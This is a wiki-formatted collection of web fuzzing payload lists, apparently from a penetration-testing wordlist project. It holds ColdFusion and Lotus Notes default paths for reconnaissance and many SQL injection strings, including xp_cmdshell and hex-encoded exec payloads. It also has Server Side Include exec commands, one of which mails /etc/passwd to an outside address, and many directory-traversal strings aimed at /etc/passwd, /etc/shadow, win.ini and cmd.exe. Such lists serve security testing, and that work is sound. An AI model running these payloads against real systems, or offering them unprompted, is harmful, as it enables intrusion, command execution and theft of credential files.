=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
